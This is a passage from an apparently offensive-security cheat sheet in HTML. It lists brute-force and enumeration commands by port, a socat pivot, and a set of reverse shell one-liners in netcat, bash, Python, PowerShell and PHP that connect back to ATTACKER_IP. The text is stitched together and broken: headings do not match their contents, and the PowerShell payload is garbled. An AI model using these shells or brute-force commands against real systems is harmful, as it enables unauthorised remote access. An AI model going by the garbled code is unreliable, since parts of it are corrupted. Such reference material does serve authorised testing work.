Hacktricks Offline

git clone https://github.com/carlospolop/hacktricks.git
cd hacktricks
mkdocs build

This creates a site/ folder filled with fully linked HTML files. You can zip this folder and carry it anywhere.

socat TCP-LISTEN:8080,fork TCP:internal_host:80</code></pre>

        <h3>Common Ports to Check</h3>
        <table>
            <tr><th>Port</th><th>Service</th><th>Enumeration Command</th></tr>
            <tr><td>21</td><td>FTP</td><td>ftp, hydra -L users.txt -P pass.txt ftp://target</td></tr>
            <tr><td>22</td><td>SSH</td><td>ssh user@target, hydra ssh</td></tr>
            <tr><td>80/443</td><td>HTTP/S</td><td>gobuster, nikto, curl -I</td></tr>
            <tr><td>139/445</td><td>SMB</td><td>smbclient -L //target, enum4linux</td></tr>
            <tr><td>3306</td><td>MySQL</td><td>mysql -h target -u root -p</td></tr>
            <tr><td>27017</td><td>MongoDB</td><td>mongo --host target</td></tr>
            <tr><td>6379</td><td>Redis</td><td>redis-cli -h target</td></tr>
        </table>
    </section>
<!-- Password Attacks -->
    <section id="password">
        <h2>🔐 Password Attacks</h2>
        <h3>Hash Cracking (John/Hashcat)</h3>
        <pre><code># Identify hash
hash-identifier
john --list=formats

# Copy a file from the target
scp user@target:/remote/file local/file

# Windows netcat reverse shell
nc.exe ATTACKER_IP 4444 -e cmd.exe</code></pre>

        <h3>Bash</h3>
        <pre><code>bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1

0<&196;exec 196<>/dev/tcp/ATTACKER_IP/4444; sh <&196 >&196 2>&196</code></pre>

        <h3>Python</h3>
        <pre><code>python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKER_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'</code></pre>
<h3>PowerShell (Windows)</h3>
        <pre><code>powershell -NoP -NonI -W Hidden -Exec Bypass -Command "$client = New-Object System.Net.Sockets.TCPClient('ATTACKER_IP',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%0;while(($i = $stream.Read($bytes,0,$bytes.Length)) -ne 0) Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush();$client.Close()"</code></pre>
<h3>PHP</h3>
        <pre><code>php -r '$sock=fsockopen("ATTACKER_IP",4444);exec("/bin/sh -i <&3 >&3 2>&3");'</code></pre>
    </section>
<!-- File Transfer -->
    <section id="transfer">
        <h2>📁 File Transfer</h2>
        <h3>Linux -> Linux</h3>
        <pre><code># HTTP server (attacker)

python3 -m http.server 8000